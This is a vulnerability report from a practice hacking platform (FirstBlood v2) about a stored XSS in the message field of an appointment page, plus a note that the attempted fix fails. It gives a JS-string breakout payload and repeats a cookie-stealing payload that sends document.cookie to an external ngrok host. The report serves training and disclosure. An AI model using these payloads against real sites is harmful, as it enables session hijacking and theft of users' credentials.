FirstBlood-#666Stored xss by meesage field on MANAGE APPOINTMENT
This issue was discovered on FirstBlood v2

On 2021-10-27, newrouge Level 3 reported:

Hey, i found that message parameter is vulnerable to stored XSS and it affects all user's visiting the manage appointment page with our appointment ID.

Steps:

  • User's message was reflecting inside msg='hello user' variable in js context.

  • As we have learned on barker that it is possible to get XSS in JS context by using arithmetic operators i.e '-alert(1)-'.

  • Make an appointment with message: '-alert(1)-'

  • Now copy the appointment id, and retrieve your appointment on manage appointment. Xss will execute.

    http://firstbloodhackers.com/manageappointment.php?success&aptid=3a03d769-7570-4b54-82c5-2fdb2b750d85

  • Now let's try to steal admin or any user cookies with this payload in message field.

           test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test

it becomes : 

        <script>msg='test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test'</script>

It closes msg='' variable. then put our payload document.cookie and lastly a='test' closes the quote appended by program in end.

P2 High

Endpoint: /manageappointment.php?success&aptid=3a03d769-7570-4b54-82c5-2fdb2b750d85

Parameter: message=

Payload: test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test

FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.